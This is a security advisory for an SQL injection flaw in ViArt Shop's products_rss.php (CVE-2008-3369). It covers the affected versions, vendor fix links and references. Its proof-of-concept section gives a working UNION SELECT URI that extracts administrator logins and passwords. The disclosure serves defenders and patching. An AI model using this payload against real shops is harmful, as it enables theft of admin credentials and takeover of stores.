BID:30409

ViArt Shop 'products_rss.php' SQL Injection Vulnerability

Info

ViArt Shop 'products_rss.php' SQL Injection Vulnerability

Bugtraq ID:	30409
Class:	Input Validation Error
CVE:	CVE-2008-3369
Remote:	Yes
Local:	No
Published:	Jul 28 2008 12:00AM
Updated:	May 07 2015 05:25PM
Credit:	James Bercegay of the GulfTech Security Research Team
Vulnerable:	ViArt ViArt Shop 3.3.2 ViArt ViArt Shop 2.5.5 ViArt ViArt Shop 3.5 ViArt ViArt Shop 3.3 beta ViArt ViArt Shop 3.3 ViArt ViArt Shop 3.2

Not Vulnerable:

Discussion

ViArt Shop 'products_rss.php' SQL Injection Vulnerability

ViArt Shop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

ViArt Shop 3.5 and prior versions are vulnerable.

Exploit / POC

ViArt Shop 'products_rss.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/products_rss.php?category_id=1' UNION SELECT concat(login,char(58),password),0 FROM va_admins -- /*

Solution / Fix

ViArt Shop 'products_rss.php' SQL Injection Vulnerability

Solution:
The vendor has released a fix. Please see the references for more information.

ViArt ViArt Shop 3.2

ViArt products_rss-3.5.zip
http://www.viart.com/downloads/products_rss-3.5.zip

ViArt ViArt Shop 3.3 beta

ViArt products_rss-3.5.zip
http://www.viart.com/downloads/products_rss-3.5.zip

ViArt ViArt Shop 3.5

ViArt products_rss-3.5.zip
http://www.viart.com/downloads/products_rss-3.5.zip

ViArt ViArt Shop 3.3

ViArt products_rss-3.5.zip
http://www.viart.com/downloads/products_rss-3.5.zip

ViArt ViArt Shop 2.5.5

ViArt products_rss-3.5.zip
http://www.viart.com/downloads/products_rss-3.5.zip

ViArt ViArt Shop 3.3.2

ViArt products_rss-3.5.zip
http://www.viart.com/downloads/products_rss-3.5.zip

References

ViArt Shop 'products_rss.php' SQL Injection Vulnerability

References:

Another critical SQL injection Security Fix for version 3.5 (ViArt)
Vendor Homepage (ViArt)
ViArt <= 3.5 SQL Injection (GulfTech Security Research )